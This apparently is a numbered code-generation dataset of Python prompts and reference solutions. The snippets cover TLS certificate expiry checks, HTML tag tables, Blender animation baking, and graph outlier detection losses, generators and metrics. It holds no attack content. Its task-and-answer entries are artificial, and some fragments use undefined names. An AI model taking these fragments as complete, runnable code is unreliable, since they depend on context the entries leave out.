def get_host_info(url):
    """Extract the network location (host[:port]) component from a URL."""
    return urllib.parse.urlparse(url).netloc
3,788 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def get_certificate_expiration_date(host):
    """Fetch *host*'s TLS certificate (port 443) and describe its expiry.

    Returns a string like "YYYY-MM-DD(剩N天到期)" ("N days until expiry")
    for a valid certificate, or '' when the certificate is missing or
    already expired. Performs a live network connection.
    """
    result = ''
    hostname = host
    port = 443
    # PEM text of the server certificate; raises on connection failure.
    cert = ssl.get_server_certificate((hostname, port)).encode()
    if(cert):
        cert_obj = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
        # notAfter is an ASN.1 timestamp; parse and reformat it.
        cert_expire_time = parser.parse(cert_obj.get_notAfter().decode("UTF-8")).strftime('%Y-%m-%d %H:%M:%S')
        if(cert_obj.has_expired()):
            result = ''
        else:
            # NOTE(review): mixes the certificate's (UTC-derived) expiry with
            # local datetime.now() - the day count can be off by the local
            # UTC offset; confirm this is acceptable.
            current_date = datetime.datetime.now()
            remaining_days = (datetime.datetime.strptime(cert_expire_time, "%Y-%m-%d %H:%M:%S") - current_date).days
            yymmdd_expiration_date = str(cert_expire_time)[0:10]
            result = str(yymmdd_expiration_date)+"(剩"+str(remaining_days)+ "天到期)"
    else:
        result = ''
    return result
3,789 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def get_all_tag(website_info_data):
    """Group website rows by the tags in their semicolon-separated "Tag" column.

    Returns {"all_tag": [tag, ...], "all_tag_info_data": [[row, ...], ...]}
    where the two lists are index-aligned (bucket i holds all rows carrying
    tag i, in first-seen order).
    """
    all_tag = []
    all_tag_info_data = []
    # First pass: collect every distinct tag, preserving first-seen order.
    for website_info_index, website_info_row in website_info_data.iterrows():
        pure_tag_list = [
            piece.strip()
            for piece in website_info_row["Tag"].split(";")
            if piece.strip() != ""
        ]
        for pure_tag in pure_tag_list:
            if pure_tag not in all_tag:
                all_tag.append(pure_tag)
                all_tag_info_data.append([])
        print("pure_tag_list", pure_tag_list)
        print(
            "tag==>>",
            website_info_index,
            website_info_row["Tag"],
            "pure_tag_list==>>",
            pure_tag_list,
        )
    # Second pass: append each row to the bucket of every tag it carries.
    for website_info_index, website_info_row in website_info_data.iterrows():
        for raw_tag in website_info_row["Tag"].split(";"):
            pure_tag = raw_tag.strip()
            if pure_tag != "":
                all_tag_info_data[all_tag.index(pure_tag)].append(website_info_row)
    print("all_tag", all_tag, "all_tag_info_data", all_tag_info_data)
    return {"all_tag": all_tag, "all_tag_info_data": all_tag_info_data}
3,790 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def short_url(url):
    """Strip scheme, leading "www." and trailing "/" from *url*; ellipsize past 30 chars."""
    # Same check order as the original: http://, then https://, then www.
    # (each prefix is tested once against the current remainder).
    for prefix in ("http://", "https://", "www."):
        if url.startswith(prefix):
            url = url[len(prefix):]
    if url.endswith("/"):
        url = url[:-1]
    return url[:30] + "..." if len(url) > 30 else url
3,791 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def replaceTemplate(template, reInfo, data):
    """Replace every occurrence of the first regex match of *reInfo* with *data*.

    Raises IndexError when the pattern does not match at all (unchanged from
    the original contract).
    """
    first_hit = re.findall(reInfo, template)[0]
    # str.replace substitutes ALL literal occurrences of the matched text.
    return template.replace(first_hit, data)
3,792 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def create_tag_table_html(tag_name, tag_info_data):
    """Render one tag's website rows as an HTML table, book-ended by back-to-TOC links."""
    print("==create_tag_table_html", tag_name)
    pieces = ["<a href='#目录'>🔙目录</a>" + "\n" + "<table>"]
    # Decorative two-column header row (Name / Description).
    pieces.append(
        "<tr>"
        "<td width='400'>"
        "<span>(づ。◕‿‿◕。)づ</span><br/><span>Name</span>"
        "</td>"
        "<td>"
        "<span> (●゚ω゚●)</span><br/><span>Description</span>"
        "</td>"
        "</tr>"
    )
    for info_data in tag_info_data:
        print(
            "==>>",
            {
                "Name": info_data["Name"],
                "Url": info_data["Url"],
                "Description": info_data["Description"],
            },
        )
        pieces.append(
            "<tr>"
            "<td>" + info_data["Name"] + "</td>"
            "<td>" + info_data["Description"] + "</td>"
            "</tr>"
        )
    pieces.append("</table>" + "\n" + "<a href='#目录'>🔙目录</a>" + "\n")
    return "".join(pieces)
3,793 | import bpy
from bpy.types import Action, Context
def action_frame_range(act: Action):
    """Return [min_start, max_end] over the frame ranges of all f-curves of *act*.

    With no f-curves the sentinel pair [9999999999, -9999999999] is returned
    unchanged, as in the original.
    """
    lo = 9999999999
    hi = -9999999999
    for curve in act.fcurves:
        rng = curve.range()
        if rng[0] < lo:
            lo = rng[0]
        if rng[1] > hi:
            hi = rng[1]
    return [lo, hi]
def action_to_python_data_text(act: Action, text_block_name):
    """Bake every f-curve of *act* to per-integer-frame samples and dump them
    as a Python dict literal into a new Blender text block named
    *text_block_name*.

    Keys are (data_path, array_index) tuples; values are lists of
    (frame, value) pairs covering the action's full frame range.
    """
    channels = {}
    act_range = action_frame_range(act)
    # Sample each curve at every integer frame of the action's overall range.
    for curve in act.fcurves:
        baked_keys = []
        for frame in range(int(act_range[0]), int(act_range[1]) + 1):
            baked_keys += [(frame, curve.evaluate(frame))]
        channels[(curve.data_path, curve.array_index)] = baked_keys
    # Format as a literal dict: {(path, idx): [(frame, value), ...], ...}
    text = "{\n"
    for k in channels:
        text += "    {}: [".format(k)
        for point in channels[k]:
            text += "({}, {:.6f}), ".format(point[0], point[1])
        text += "],\n"
    text += "}\n"
    # from_string returns None; the new text block lives in bpy.data.texts.
    return bpy.data.texts.new(text_block_name).from_string(text)
3,794 | import bpy
from bpy.types import Action, Context
def python_data_to_loop_action(data, action_name, rot_factor=1.0, loc_factor=1.0) -> Action:
    """Rebuild a looping Blender Action from baked channel data.

    *data* maps (data_path, array_index) -> [(frame, value), ...] (the format
    produced by action_to_python_data_text). Rotation channels are scaled by
    *rot_factor* and location channels by *loc_factor*. Each curve gets AUTO
    handles, its last key clamped to the first key's value to guarantee a
    seamless loop, and a CYCLES modifier for infinite repetition.
    """
    act = bpy.data.actions.new(action_name)
    for k in data:
        curve = act.fcurves.new(k[0], index=k[1])
        curve.keyframe_points.add(len(data[k]))
        for i in range(len(data[k])):
            co = [data[k][i][0], data[k][i][1]]
            # Scale by channel kind (data_path prefix selects the factor).
            if k[0].startswith("rotation"):
                co[1] *= rot_factor
            if k[0].startswith("location"):
                co[1] *= loc_factor
            curve.keyframe_points[i].co = co
            curve.keyframe_points[i].handle_left_type = 'AUTO'
            curve.keyframe_points[i].handle_right_type = 'AUTO'
        curve.keyframe_points[-1].co[1] = curve.keyframe_points[0].co[1] # Ensure looping.
        curve.modifiers.new('CYCLES')
        curve.update()
    # Drop all users so the action can be garbage-collected if unused.
    act.use_fake_user = False
    act.user_clear()
    return act
3,795 | from setuptools import find_packages, setup
from os import path
# NOTE(review): ver_file is not defined in this chunk - presumably assigned
# earlier in the original setup.py (path of a version module to exec).
with open(ver_file) as f:
    exec(f.read())
this_directory = path.abspath(path.dirname(__file__))
# requirements.txt lines become the install dependency list.
with open(path.join(this_directory, 'requirements.txt'),
          encoding='utf-8') as f:
    requirements = f.read().splitlines()
def readme():
    """Return the long description from README.rst (UTF-8)."""
    with open(path.join(this_directory, 'README.rst'), encoding='utf-8') as f:
        return f.read()
3,796 | import torch
import torch.nn.functional as F
from scipy.linalg import sqrtm
import math
The provided code snippet includes necessary dependencies for implementing the `double_recon_loss` function. Write a Python function `def double_recon_loss(x, x_, s, s_, weight=0.5, pos_weight_a=0.5, pos_weight_s=0.5, bce_s=False)` to solve the following problem:
r""" Double reconstruction loss function for feature and structure. The loss function is defined as :math:`\alpha \symbf{E_a} + (1-\alpha) \symbf{E_s}`, where :math:`\alpha` is the weight between 0 and 1 inclusive, and :math:`\symbf{E_a}` and :math:`\symbf{E_s}` are the reconstruction loss for feature and structure, respectively. The first dimension is kept for outlier scores of each node. For feature reconstruction, we use mean squared error loss: :math:`\symbf{E_a} = \|\symbf{X}-\symbf{X}'\|\odot H`, where :math:`H=\begin{cases}1 - \eta & \text{if }x_{ij}=0\\ \eta & \text{if }x_{ij}>0\end{cases}`, and :math:`\eta` is the positive weight for feature. For structure reconstruction, we use mean squared error loss by default: :math:`\symbf{E_s} = \|\symbf{S}-\symbf{S}'\|\odot \Theta`, where :math:`\Theta=\begin{cases}1 - \theta & \text{if }s_{ij}=0\\ \theta & \text{if }s_{ij}>0 \end{cases}`, and :math:`\theta` is the positive weight for structure. Alternatively, we can use binary cross entropy loss for structure reconstruction: :math:`\symbf{E_s} = \text{BCE}(\symbf{S}, \symbf{S}' \odot \Theta)`. Parameters ---------- x : torch.Tensor Ground truth node feature x_ : torch.Tensor Reconstructed node feature s : torch.Tensor Ground truth node structure s_ : torch.Tensor Reconstructed node structure weight : float, optional Balancing weight :math:`\alpha` between 0 and 1 inclusive between node feature and graph structure. Default: ``0.5``. pos_weight_a : float, optional Positive weight for feature :math:`\eta`. Default: ``0.5``. pos_weight_s : float, optional Positive weight for structure :math:`\theta`. Default: ``0.5``. bce_s : bool, optional Use binary cross entropy for structure reconstruction loss. Returns ------- score : torch.tensor Outlier scores of shape :math:`N` with gradients.
Here is the function:
def double_recon_loss(x,
                      x_,
                      s,
                      s_,
                      weight=0.5,
                      pos_weight_a=0.5,
                      pos_weight_s=0.5,
                      bce_s=False):
    r"""Weighted double reconstruction loss over node features and structure.

    Computes ``weight * E_a + (1 - weight) * E_s`` per node, where ``E_a``
    is the feature reconstruction error (row-wise root of the summed,
    optionally positively re-weighted squared error) and ``E_s`` is the
    structure reconstruction error (squared error, or binary cross entropy
    when ``bce_s`` is True), re-weighted analogously.

    Parameters
    ----------
    x, x_ : torch.Tensor
        Ground-truth and reconstructed node features.
    s, s_ : torch.Tensor
        Ground-truth and reconstructed node structure.
    weight : float, optional
        Balance in [0, 1] between feature and structure terms. Default 0.5.
    pos_weight_a, pos_weight_s : float, optional
        Positive-entry weights in [0, 1] for features / structure;
        the value 0.5 disables re-weighting. Default 0.5.
    bce_s : bool, optional
        Use binary cross entropy for the structure term. Default False.

    Returns
    -------
    torch.Tensor
        Per-node outlier scores of shape ``N`` (keeps gradients).
    """
    assert 0 <= weight <= 1, "weight must be a float between 0 and 1."
    assert 0 <= pos_weight_a <= 1 and 0 <= pos_weight_s <= 1, \
        "positive weight must be a float between 0 and 1."
    # Feature term: squared error, shifted toward nonzero entries only when
    # a non-default positive weight is supplied.
    attr_diff = (x - x_) ** 2
    if pos_weight_a != 0.5:
        attr_diff = torch.where(x > 0,
                                attr_diff * pos_weight_a,
                                attr_diff * (1 - pos_weight_a))
    attr_error = attr_diff.sum(1).sqrt()
    # Structure term: BCE or squared error, re-weighted the same way.
    if bce_s:
        stru_diff = F.binary_cross_entropy(s_, s, reduction='none')
    else:
        stru_diff = (s - s_) ** 2
    if pos_weight_s != 0.5:
        stru_diff = torch.where(s > 0,
                                stru_diff * pos_weight_s,
                                stru_diff * (1 - pos_weight_s))
    stru_error = stru_diff.sum(1).sqrt()
    return weight * attr_error + (1 - weight) * stru_error
3,797 | import torch
import torch.nn.functional as F
from scipy.linalg import sqrtm
import math
The provided code snippet includes necessary dependencies for implementing the `KL_neighbor_loss` function. Write a Python function `def KL_neighbor_loss(predictions, targets, mask_len, device)` to solve the following problem:
The local neighbor distribution KL divergence loss used in GAD-NR. Source: https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb
Here is the function:
def KL_neighbor_loss(predictions, targets, mask_len, device):
    """Closed-form KL divergence between Gaussians fitted to the predicted
    and ground-truth local neighborhood representations, used as the
    neighborhood reconstruction loss in GAD-NR.
    Source:
    https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb

    Only the first ``mask_len`` rows of each input are used; both inputs are
    detached and moved to CPU before fitting the Gaussians.
    """
    pred = predictions.squeeze().cpu().detach()[:mask_len, :]
    true = targets.squeeze().cpu().detach()[:mask_len, :]
    mu_p = pred.mean(0)
    mu_t = true.mean(0)
    num_rows = pred.shape[0]
    dim = pred.shape[1]
    denom = max(num_rows - 1, 1)
    identity = torch.eye(dim)
    # sample covariances, regularized with the identity so both are invertible
    cov_p = (pred - mu_p).transpose(1, 0).matmul(pred - mu_p) / denom + identity
    cov_t = (true - mu_t).transpose(1, 0).matmul(true - mu_t) / denom + identity
    inv_cov_t = torch.inverse(cov_t)
    # KL(N(mu_p, cov_p) || N(mu_t, cov_t)) in closed form
    log_det_ratio = math.log(torch.det(cov_p) / torch.det(cov_t))
    trace_term = torch.trace(inv_cov_t.matmul(cov_p))
    diff = mu_t - mu_p
    quad_term = diff.reshape(1, -1).matmul(inv_cov_t).matmul(diff)
    kl = 0.5 * (log_det_ratio - dim + trace_term + quad_term)
    return kl.to(device)
3,798 | import torch
import torch.nn.functional as F
from scipy.linalg import sqrtm
import math
The provided code snippet includes necessary dependencies for implementing the `W2_neighbor_loss` function. Write a Python function `def W2_neighbor_loss(predictions, targets, mask_len, device)` to solve the following problem:
The local neighbor distribution W2 loss used in GAD-NR. Source: https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb
Here is the function:
def W2_neighbor_loss(predictions, targets, mask_len, device):
    """The local neighbor distribution 2-Wasserstein loss used in GAD-NR.
    Source:
    https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb

    Fits a Gaussian to the first ``mask_len`` rows of ``predictions`` and
    ``targets`` (detached, on CPU) and returns the squared 2-Wasserstein
    distance between them:
    ``||mu1 - mu2||^2 + Tr(C1 + C2 - 2 * (C1^{1/2} C2 C1^{1/2})^{1/2})``.

    Parameters
    ----------
    predictions : torch.Tensor
        Predicted neighborhood representations.
    targets : torch.Tensor
        Ground-truth neighborhood representations.
    mask_len : int
        Number of leading rows to use from each input.
    device : str or torch.device
        Device to place the resulting loss on.

    Returns
    -------
    W2_loss : torch.Tensor
        Scalar squared 2-Wasserstein distance.
    """
    x1 = predictions.squeeze().cpu().detach()[:mask_len, :]
    x2 = targets.squeeze().cpu().detach()[:mask_len, :]
    mean_x1 = x1.mean(0)
    mean_x2 = x2.mean(0)
    nn = x1.shape[0]
    cov_x1 = (x1 - mean_x1).transpose(1, 0).matmul(x1 - mean_x1) / max(nn - 1, 1)
    cov_x2 = (x2 - mean_x2).transpose(1, 0).matmul(x2 - mean_x2) / max(nn - 1, 1)
    # BUG FIX: in the original, "+ torch.trace(...)" sat on its own line with
    # no parentheses or continuation, so it parsed as a separate, discarded
    # expression statement and the trace term never contributed to the loss.
    # The cross term also used "+ 2 * sqrtm(...)" where the closed-form W2
    # (Bures) distance between Gaussians requires "- 2 * sqrtm(...)".
    cross = sqrtm(sqrtm(cov_x1) @ cov_x2.numpy() @ sqrtm(cov_x1))
    # sqrtm may return a complex array with negligible imaginary part when the
    # product is numerically near-singular; keep the real part only.
    cross = torch.from_numpy(cross.real.copy())
    W2_loss = (torch.square(mean_x1 - mean_x2).sum()
               + torch.trace(cov_x1 + cov_x2 - 2 * cross))
    W2_loss = W2_loss.to(device)
    return W2_loss
3,799 | import torch
from torch_geometric.data import Data
from ..utils.utility import check_parameter
def check_parameter(param, low=MIN_INT, high=MAX_INT, param_name='',
                    include_left=False, include_right=False):
    """Check if an input is within the defined range.

    Parameters
    ----------
    param : int, float
        The input parameter to check.
    low : int, float
        The lower bound of the range.
    high : int, float
        The higher bound of the range.
    param_name : str, optional (default='')
        The name of the parameter.
    include_left : bool, optional (default=False)
        Whether includes the lower bound (lower bound <=).
    include_right : bool, optional (default=False)
        Whether includes the higher bound (<= higher bound).

    Returns
    -------
    within_range : bool or raise errors
        Whether the parameter is within the range of (low, high)
    """
    # param, low and high should all be numerical
    if not isinstance(param, (numbers.Integral, int, float)):
        # BUG FIX: original message ran the value and the explanation
        # together ("{param} Not numerical"); add the separating period
        raise TypeError('{param_name} is set to {param}. Not numerical'.format(
            param=param, param_name=param_name))
    if not isinstance(low, (numbers.Integral, int, float)):
        raise TypeError('low is set to {low}. Not numerical'.format(low=low))
    if not isinstance(high, (numbers.Integral, int, float)):
        raise TypeError('high is set to {high}. Not numerical'.format(
            high=high))
    # at least one of the bounds should be specified
    if low is MIN_INT and high is MAX_INT:
        # BUG FIX: original said "Neither low nor high bounds is undefined",
        # which states the opposite of the condition detected here
        raise ValueError('Neither low nor high bound is specified')
    # if wrong bound values are used
    if low > high:
        raise ValueError(
            'Lower bound > Higher bound')
    # value check under different bound conditions
    if (include_left and include_right) and (param < low or param > high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of [{low}, {high}].'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (include_left and not include_right) and (
            param < low or param >= high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of [{low}, {high}).'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (not include_left and include_right) and (
            param <= low or param > high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of ({low}, {high}].'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (not include_left and not include_right) and (
            param <= low or param >= high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of ({low}, {high}).'.format(
                param=param, low=low, high=high, param_name=param_name))
    else:
        return True
The provided code snippet includes necessary dependencies for implementing the `gen_structural_outlier` function. Write a Python function `def gen_structural_outlier(data, m, n, p=0, directed=False, seed=None)` to solve the following problem:
Generating structural outliers according to paper : cite:`ding2019deep`. We randomly select ``m`` nodes from the network and then make those nodes fully connected, and then all the ``m`` nodes in the clique are regarded as outliers. We iteratively repeat this process until a number of ``n`` cliques are generated and the total number of structural outliers is ``m * n``. Parameters ---------- data : torch_geometric.data.Data The input data. m : int Number nodes in the outlier cliques. n : int Number of outlier cliques. p : int, optional Probability of edge drop in cliques. Default: ``0``. directed : bool, optional Whether the edges added are directed. Default: ``False``. seed : int, optional The seed to control the randomness, Default: ``None``. Returns ------- data : torch_geometric.data.Data The structural outlier graph with injected edges. y_outlier : torch.Tensor The outlier label tensor where 1 represents outliers and 0 represents normal nodes.
Here is the function:
def gen_structural_outlier(data, m, n, p=0, directed=False, seed=None):
    """Generating structural outliers according to paper :
    cite:`ding2019deep`. We randomly select ``m`` nodes from the network
    and then make those nodes fully connected, and then all the ``m``
    nodes in the clique are regarded as outliers. We iteratively repeat
    this process until a number of ``n`` cliques are generated and the
    total number of structural outliers is ``m * n``.

    Parameters
    ----------
    data : torch_geometric.data.Data
        The input data.
    m : int
        Number of nodes in each outlier clique.
    n : int
        Number of outlier cliques.
    p : float, optional
        Probability of edge drop in cliques. Default: ``0``.
    directed : bool, optional
        Whether the edges added are directed. Default: ``False``.
    seed : int, optional
        The seed to control the randomness. Default: ``None``.

    Returns
    -------
    data : torch_geometric.data.Data
        The structural outlier graph with injected edges.
    y_outlier : torch.Tensor
        The outlier label tensor where 1 represents outliers and 0
        represents normal nodes.
    """
    if not isinstance(data, Data):
        raise TypeError("data should be torch_geometric.data.Data")
    if isinstance(m, int):
        check_parameter(m, low=0, high=data.num_nodes, param_name='m')
    else:
        raise ValueError("m should be int, got %s" % m)
    if isinstance(n, int):
        check_parameter(n, low=0, high=data.num_nodes, param_name='n')
    else:
        raise ValueError("n should be int, got %s" % n)
    check_parameter(m * n, low=0, high=data.num_nodes, param_name='m*n')

    # BUG FIX: ``if seed:`` silently ignored ``seed=0``; compare against None
    if seed is not None:
        torch.manual_seed(seed)

    outlier_idx = torch.randperm(data.num_nodes)[:m * n]

    # connect all m nodes in each clique
    new_edges = []
    for i in range(n):
        new_edges.append(torch.combinations(outlier_idx[m * i: m * (i + 1)]))
    new_edges = torch.cat(new_edges)

    # drop edges with probability p
    if p != 0:
        indices = torch.randperm(len(new_edges))[:int((1 - p) * len(new_edges))]
        new_edges = new_edges[indices]

    # size labels from num_nodes so graphs without node features also work
    # (original read data.x.shape[0], which fails when data.x is None)
    y_outlier = torch.zeros(data.num_nodes, dtype=torch.long)
    y_outlier[outlier_idx] = 1

    if not directed:
        # add the reverse direction of every injected edge
        new_edges = torch.cat([new_edges, new_edges.flip(1)], dim=0)

    data.edge_index = torch.cat([data.edge_index, new_edges.T], dim=1)

    return data, y_outlier
3,800 | import torch
from torch_geometric.data import Data
from ..utils.utility import check_parameter
def check_parameter(param, low=MIN_INT, high=MAX_INT, param_name='',
                    include_left=False, include_right=False):
    """Check if an input is within the defined range.

    Parameters
    ----------
    param : int, float
        The input parameter to check.
    low : int, float
        The lower bound of the range.
    high : int, float
        The higher bound of the range.
    param_name : str, optional (default='')
        The name of the parameter.
    include_left : bool, optional (default=False)
        Whether includes the lower bound (lower bound <=).
    include_right : bool, optional (default=False)
        Whether includes the higher bound (<= higher bound).

    Returns
    -------
    within_range : bool or raise errors
        Whether the parameter is within the range of (low, high)
    """
    # param, low and high should all be numerical
    if not isinstance(param, (numbers.Integral, int, float)):
        # BUG FIX: original message ran the value and the explanation
        # together ("{param} Not numerical"); add the separating period
        raise TypeError('{param_name} is set to {param}. Not numerical'.format(
            param=param, param_name=param_name))
    if not isinstance(low, (numbers.Integral, int, float)):
        raise TypeError('low is set to {low}. Not numerical'.format(low=low))
    if not isinstance(high, (numbers.Integral, int, float)):
        raise TypeError('high is set to {high}. Not numerical'.format(
            high=high))
    # at least one of the bounds should be specified
    if low is MIN_INT and high is MAX_INT:
        # BUG FIX: original said "Neither low nor high bounds is undefined",
        # which states the opposite of the condition detected here
        raise ValueError('Neither low nor high bound is specified')
    # if wrong bound values are used
    if low > high:
        raise ValueError(
            'Lower bound > Higher bound')
    # value check under different bound conditions
    if (include_left and include_right) and (param < low or param > high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of [{low}, {high}].'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (include_left and not include_right) and (
            param < low or param >= high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of [{low}, {high}).'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (not include_left and include_right) and (
            param <= low or param > high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of ({low}, {high}].'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (not include_left and not include_right) and (
            param <= low or param >= high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of ({low}, {high}).'.format(
                param=param, low=low, high=high, param_name=param_name))
    else:
        return True
The provided code snippet includes necessary dependencies for implementing the `gen_contextual_outlier` function. Write a Python function `def gen_contextual_outlier(data, n, k, seed=None)` to solve the following problem:
r"""Generating contextual outliers according to paper :cite:`ding2019deep`. We randomly select ``n`` nodes as the attribute perturbation candidates. For each selected node :math:`i`, we randomly pick another ``k`` nodes from the data and select the node :math:`j` whose attributes :math:`x_j` deviate the most from node :math:`i`'s attribute :math:`x_i` among ``k`` nodes by maximizing the Euclidean distance :math:`\| x_i − x_j \|`. Afterwards, we then substitute the attributes :math:`x_i` of node :math:`i` to :math:`x_j`. Parameters ---------- data : torch_geometric.data.Data The input data. n : int Number of nodes converting to outliers. k : int Number of candidate nodes for each outlier node. seed : int, optional The seed to control the randomness, Default: ``None``. Returns ------- data : torch_geometric.data.Data The contextual outlier graph with modified node attributes. y_outlier : torch.Tensor The outlier label tensor where 1 represents outliers and 0 represents normal nodes.
Here is the function:
def gen_contextual_outlier(data, n, k, seed=None):
    r"""Generating contextual outliers according to paper
    :cite:`ding2019deep`. We randomly select ``n`` nodes as the
    attribute perturbation candidates. For each selected node :math:`i`,
    we randomly pick another ``k`` nodes from the data and select the
    node :math:`j` whose attributes :math:`x_j` deviate the most from
    node :math:`i`'s attribute :math:`x_i` among ``k`` nodes by
    maximizing the Euclidean distance :math:`\| x_i − x_j \|`.
    Afterwards, we then substitute the attributes :math:`x_i` of node
    :math:`i` to :math:`x_j`.

    Parameters
    ----------
    data : torch_geometric.data.Data
        The input data.
    n : int
        Number of nodes converting to outliers.
    k : int
        Number of candidate nodes for each outlier node.
    seed : int, optional
        The seed to control the randomness. Default: ``None``.

    Returns
    -------
    data : torch_geometric.data.Data
        The contextual outlier graph with modified node attributes.
    y_outlier : torch.Tensor
        The outlier label tensor where 1 represents outliers and 0
        represents normal nodes.
    """
    if not isinstance(data, Data):
        raise TypeError("data should be torch_geometric.data.Data")
    if isinstance(n, int):
        check_parameter(n, low=0, high=data.num_nodes, param_name='n')
    else:
        raise ValueError("n should be int, got %s" % n)
    if isinstance(k, int):
        check_parameter(k, low=0, high=data.num_nodes - n, param_name='k')
    else:
        raise ValueError("k should be int, got %s" % k)

    # BUG FIX: ``if seed:`` silently ignored ``seed=0``; compare against None
    if seed is not None:
        torch.manual_seed(seed)

    outlier_idx = torch.randperm(data.num_nodes)[:n]
    for idx in outlier_idx:
        candidate_idx = torch.randperm(data.num_nodes)[:k]
        # Euclidean distance from node ``idx`` to each candidate
        euclidean_dist = torch.cdist(data.x[idx].unsqueeze(0),
                                     data.x[candidate_idx])
        max_dist_idx = torch.argmax(euclidean_dist, dim=1)
        # NOTE(review): substitution happens in place and sequentially, so a
        # later outlier may copy attributes already replaced earlier — this
        # matches the original behavior; confirm it is intended upstream.
        data.x[idx] = data.x[candidate_idx[max_dist_idx]]

    y_outlier = torch.zeros(data.x.shape[0], dtype=torch.long)
    y_outlier[outlier_idx] = 1

    return data, y_outlier
3,801 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_roc_auc` function. Write a Python function `def eval_roc_auc(label, score)` to solve the following problem:
ROC-AUC score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. Returns ------- roc_auc : float Average ROC-AUC score across different labels.
Here is the function:
def eval_roc_auc(label, score):
    """Area under the ROC curve for binary outlier detection.

    Parameters
    ----------
    label : torch.Tensor
        Binary ground-truth labels of shape ``(N, )``; 1 marks outliers,
        0 marks normal instances.
    score : torch.Tensor
        Outlier scores of shape ``(N, )``.

    Returns
    -------
    roc_auc : float
        ROC-AUC score.
    """
    return roc_auc_score(y_true=label, y_score=score)
3,802 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_recall_at_k` function. Write a Python function `def eval_recall_at_k(label, score, k=None)` to solve the following problem:
Recall score for top k instances with the highest outlier scores. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. k : int, optional The number of instances to evaluate. ``None`` for recall. Default: ``None``. Returns ------- recall_at_k : float Recall for top k instances with the highest outlier scores.
Here is the function:
def eval_recall_at_k(label, score, k=None):
    """Recall among the ``k`` samples with the highest outlier scores.

    Parameters
    ----------
    label : torch.Tensor
        Binary ground-truth labels of shape ``(N, )``; 1 marks outliers,
        0 marks normal instances.
    score : torch.Tensor
        Outlier scores of shape ``(N, )``.
    k : int, optional
        How many top-scored samples to evaluate. ``None`` uses the
        number of true outliers. Default: ``None``.

    Returns
    -------
    recall_at_k : float
        Recall restricted to the top ``k`` scored samples.
    """
    if k is None:
        k = sum(label)
    hits_in_top_k = sum(label[score.topk(k).indices])
    return hits_in_top_k / sum(label)
3,803 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_precision_at_k` function. Write a Python function `def eval_precision_at_k(label, score, k=None)` to solve the following problem:
Precision score for top k instances with the highest outlier scores. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. k : int, optional The number of instances to evaluate. ``None`` for precision. Default: ``None``. Returns ------- precision_at_k : float Precision for top k instances with the highest outlier scores.
Here is the function:
def eval_precision_at_k(label, score, k=None):
    """Precision among the ``k`` samples with the highest outlier scores.

    Parameters
    ----------
    label : torch.Tensor
        Binary ground-truth labels of shape ``(N, )``; 1 marks outliers,
        0 marks normal instances.
    score : torch.Tensor
        Outlier scores of shape ``(N, )``.
    k : int, optional
        How many top-scored samples to evaluate. ``None`` uses the
        number of true outliers. Default: ``None``.

    Returns
    -------
    precision_at_k : float
        Precision restricted to the top ``k`` scored samples.
    """
    if k is None:
        k = sum(label)
    hits_in_top_k = sum(label[score.topk(k).indices])
    return hits_in_top_k / k
3,804 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_average_precision` function. Write a Python function `def eval_average_precision(label, score)` to solve the following problem:
Average precision score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. Returns ------- ap : float Average precision score.
Here is the function:
def eval_average_precision(label, score):
    """Average precision (area under the precision-recall curve) for
    binary outlier detection.

    Parameters
    ----------
    label : torch.Tensor
        Binary ground-truth labels of shape ``(N, )``; 1 marks outliers,
        0 marks normal instances.
    score : torch.Tensor
        Outlier scores of shape ``(N, )``.

    Returns
    -------
    ap : float
        Average precision score.
    """
    return average_precision_score(y_true=label, y_score=score)
3,805 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
